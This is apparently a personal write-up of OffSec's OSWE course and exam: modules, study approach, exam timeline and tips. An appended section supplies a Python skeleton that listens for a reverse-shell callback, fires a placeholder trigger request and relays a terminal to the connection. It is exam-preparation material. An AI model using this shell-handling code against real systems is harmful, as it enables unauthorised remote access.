OSWE: Web-300 Course & Exam Writeup
I recently earned OffSec’s OSWE Cert and wanted to write a quick post about the course, exam and experience in general as I find these kinds of posts really useful in choosing my next certificate.
TL;DR
Great experience overall, covers quite a lot of web attack classes. Good for anyone with the basics in web attacks. Some sections of the course feel a bit outdated but it’s all still relevant. Quite a gruelling exam as to be expected from OffSec, but a valuable experience.
What is OSWE?
OSWE (OffSec Web Expert) is the more advanced web certification from OffSec, with a focus on white-box testing - so you have access to the source code. The exam is a 48-hour proctored session where you have to bypass auth and get RCE on two webapps, then you have another 24 hours to produce a report detailing how you did it.
Course Structure & Content
It’s about a dozen modules, each one like a long blog post, focusing on one application and starting with an auth bypass attack to get initial access, then at least one more to get RCE. With each module, you get a VM to follow along with hosting the vulnerable application. There are tasks to do and ‘extra mile’ activities which push things further. There are also videos for each.
Most of the modules are white-box, but there are a couple of black-box too. Some of the featured vulns/topics in the modules are:
- SQLi
- insecure deserialization
- server-side template injection
- insecure random number generation
- XML external entity injection
- insecure password reset
- cross-site request forgery
- exploiting microservices
- prototype pollution
- exploiting dangerous functions
- bypassing WAF rules/custom filters
You also have a few challenge boxes that don’t have an associated walkthrough, which you can attack as prep for the exam. There are some modules where you decompile Java or .NET applications and others where you have the full source to work with.
My Experience
Overall, I thought the course was great. I only had 3 months lab access and it was a bit of a push, but doable. I probably averaged 10h a week of study. I completed most of the basic tasks and practically none of the extra miles, and skipped the most basic tasks completely. As well as taking in the course content, I did 4 challenge boxes, leaning on the Discord to tell if I was in a rabbit hole, again to save time.
I also did a few HTB boxes that I read were OSWE-like:
- Celestial
- Falafel
- json
- Vault
- Popcorn
- Blocky
There are two ways I think this course could be improved. First, I think some modules could do with an update. While it’s nice to walk through real CVEs and their discovery, some of them were 5+ years old.
Also I think OffSec has developed a lot in its course delivery (e.g. letting you launch custom VMs at the end of a section of text, to let you practise a technique and get a flag) and this course lacks this interactivity and feels a bit dusty compared to OSCP.
Second, there’s a module on prototype pollution that I think is a bit too dense - it starts off well-paced and clear, but as it goes on it feels rushed as it explains complex concepts too quickly for my taste - like someone rushing to get to the end of writing an essay. I used other sources like PortSwigger for prototype pollution, and found them better overall.
Apart from those minor points, the course was great. Some of the XSS and SQLi attacks were particularly enjoyable, and all of the content is relevant - blogs from people like watchTowr are covering some of the exact same techniques in 2025.
The Exam
I started at 8AM and there was a bit of a delay as the kick-off email didn’t arrive. Luckily, support was very responsive - I opened a chat, they resent it to a different address and I was up and running by 8:30, plus they extended my time by half an hour which took the pressure off a bit.
I spent the first 90 minutes or so just trying to attach the remote debugger to the debug machine and get the webapp started. I was taking my time and trying not to rush and in the first couple of hours I found the first vuln. However, there were clearly two possible paths to follow so I investigated both which took a few hours.
By 8PM I had zero flags and was feeling somewhat deflated. I went outside for a quick walk. This was really useful as when I came back, it was obvious which path I had to take. I wasn’t too confident coming into the exam, with a rushed preparation, but pushed through with trying different payloads and trying to work around the defences I was seeing in the source code. Got the first flag at 10PM, after 14 hours of work… I can’t describe how pleased I was.
The second was easy, got it in an hour, so that was the first machine done. I once read a quote from Murakami where he said he only stops writing for the day when he knows what will happen next in the story. That way, his subconscious can work on developing it before he writes again. In that vein, I knew that I should stop for the day only when I knew what the next attack should be. So I started enumerating the second machine. By 2:30 AM, I knew what the next attack would be, so I got some sleep.
I could only sleep for 3 hours, so at 5:30 AM I got up and went back to it. The auth bypass for the second machine was pretty easy and it was clear to me what the second vulnerability would be. However, there was a protection in the source that I just couldn’t bypass. I spent so long trying and failing. Then it occurred to me… just google the line of code that I’m struggling to bypass. Sure enough, there was a blog post on how to bypass this protection. I used the technique and it worked a charm.
It’s now 20:30 on the second day, just under 12 hours left and I have all the flags. But with OSWE, that’s just the start. You also have to write a script for each machine that exploits everything automatically. By hand, with no use of AI. I had some boilerplate code prepared for this and most of it was fine, but in my prep, I had overlooked the fact that with one script I will have to open a netcat listener, trigger the exploit and give the user a shell. Figuring this out took a while and during this period I spent a lot of time on 15-year-old Stack Overflow posts. But it all came together in the end.
At about 3AM, I had both my scripts working perfectly and was confident that I had all the commands and screenshots I needed for the report. I ended my exam, got some sleep and wrote the report the following day. A couple of days later, I got confirmation that I had passed.
Tips
- Get your boilerplate code sorted, including one script that listens with netcat, launches an exploit and gives you a shell
- Make sure you can easily connect to remote debugging in all the languages covered in the course
- Set up your terminals so they log every command and all output, just in case you lose something for the report
- Try to get lab access for longer than 3 months
- Take regular breaks in the exam to clear your mind and get perspective
- Supplement the learning materials with other sources like PortSwigger, Hack The Box, etc. where you need it
- Get on the Discord as soon as your access starts, it’s very useful
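The "one script that listens, triggers and hands over a shell" requirement described in the exam section and in the first tip above has a coordination problem that is worth solving before exam day rather than at 9PM on day two: the listener must be bound before the trigger fires, the trigger request usually does not return until the connection is closed (so it cannot be called inline before accept()), and a callback that never arrives should time out rather than hang the script. The skeleton below is an added example and is not code from this post or from OffSec. catch_callback takes any trigger function; trigger_placeholder and its TARGET-PLACEHOLDER URL are hypothetical stand-ins for whatever request the target needs, and interact relays the user's terminal to the connected socket the way a netcat listener would.

```python
import select
import socket
import sys
import threading
from typing import Callable, Optional, TextIO


def start_listener(port: int, timeout: float) -> socket.socket:
    """Bind and listen before anything is triggered, so the callback can never
    hit a port that is not open yet. Port 0 asks the OS for a free port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  # quick re-runs
    srv.bind(("0.0.0.0", port))
    srv.listen(1)
    srv.settimeout(timeout)  # fail loudly instead of hanging if nothing calls back
    return srv


def catch_callback(trigger: Callable[[int], None], port: int = 0,
                   timeout: float = 30.0) -> socket.socket:
    """Start listening, run the trigger in a background thread, and block in
    accept() on the main thread. The trigger runs in its own thread because the
    request that starts the callback typically blocks until the connection is
    closed; calling it inline before accept() would deadlock the script."""
    srv = start_listener(port, timeout)
    actual_port = srv.getsockname()[1]  # resolved port when 0 was requested
    try:
        threading.Thread(target=trigger, args=(actual_port,), daemon=True).start()
        conn, _addr = srv.accept()  # raises socket.timeout if nothing connects back
    finally:
        srv.close()  # one connection is all we want; stop listening
    conn.settimeout(None)
    return conn


def interact(conn: socket.socket, user_in: Optional[TextIO] = None,
             user_out: Optional[TextIO] = None) -> int:
    """Relay between the user's terminal and the socket until the remote side
    closes. Returns the number of bytes received from the remote side."""
    user_in = user_in if user_in is not None else sys.stdin
    user_out = user_out if user_out is not None else sys.stdout
    sources = [conn, user_in]
    received = 0
    while True:
        readable, _, _ = select.select(sources, [], [])
        if conn in readable:
            data = conn.recv(4096)
            if not data:  # remote side closed the connection
                break
            received += len(data)
            user_out.write(data.decode(errors="replace"))
            user_out.flush()
        if user_in in readable:
            line = user_in.readline()
            if line:
                conn.sendall(line.encode())
            else:  # user hit EOF: stop sending, keep draining remote output
                sources.remove(user_in)
                try:
                    conn.shutdown(socket.SHUT_WR)
                except OSError:
                    pass
    conn.close()
    return received


def trigger_placeholder(callback_port: int) -> None:
    """Hypothetical trigger: the single request that makes the target connect
    back to callback_port. The URL is a placeholder, not a real target."""
    import urllib.request
    url = f"http://TARGET-PLACEHOLDER/endpoint?port={callback_port}"
    with urllib.request.urlopen(url, timeout=60) as resp:
        resp.read()


if __name__ == "__main__":
    shell = catch_callback(trigger_placeholder, port=4444)
    interact(shell)
```

The same structure works for both exam machines: only the trigger function changes, and because accept() carries a timeout, a trigger that silently fails shows up as an exception within seconds instead of a script that sits there forever.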